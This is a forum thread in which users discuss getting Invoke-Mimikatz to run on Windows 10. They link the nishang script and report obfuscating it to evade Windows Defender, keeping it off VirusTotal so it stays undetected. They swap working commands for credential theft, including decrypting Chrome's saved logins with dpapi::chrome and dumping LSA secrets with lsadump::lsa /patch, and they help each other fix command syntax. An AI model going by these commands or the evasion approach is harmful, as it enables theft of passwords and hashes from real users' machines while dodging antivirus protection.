For those who like Invoke-Mimikatz (Works with Win10)

[latenightdrive]

On 9/4/2020 at 5:49 PM, kuyaya said:

Hey all

For anyone still searching for a solution, I found one!

I've been searching for a working solution just to dump the logon hashes with powershell. Haven't found a working one, but instead found a working invoke-mimikatz! The one from PowerSploit and Empire doesn't work, but the one from nishang does. Link: https://github.com/samratashok/nishang/blob/master/Gather/Invoke-Mimikatz.ps1

Time to obfuscate it...

Update (09.09, 23:41 CEST): Successfully obfuscated! I tested it on the latest win10 (version 1903 build 18362.1016). AV was Windows Defender, so it also shouldn't get detected by other AV's. I'm obviously not gonna upload it to virustotal, I don't want that script to be detectable 1 week later...

GL to all who also try it, it's totally possible.

OMG, THANK YOU

After hours of searching for a solution, that one worked! You rock 👍

[kuyaya]

On 12/29/2020 at 7:13 PM, eeeeeesy said:

I also tried nishangs mimikatz with the command

Invoke-Mimikatz -Command dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data" /unprotect

 

But I get this error about /unprotect so its not decrypting the login data from chrome.

Invoke-Mimikatz : A positional parameter cannot be found that accepts argument '/unprotect'.
At C:\Users\user4\Desktop\newest working mimikats by nishang\Invoke-Mimikatz.ps1:2754 char:1
+ Invoke-Mimikatz -Command dpapi::chrome /in:"%localappdata%\Google\Chr ...

 

Could you tell me what I'm doing wrong?

Yes, you're using the commands wrong.

If you want to execute an Invoke-Mimikatz command with spaces, you have to enclose it like that:

Invoke-Mimikatz -Command '"lsadump::lsa /patch"'

However, this doesn't work for commands which require quotes in the command, like the dpapi::chrome does. I'll search for something which works.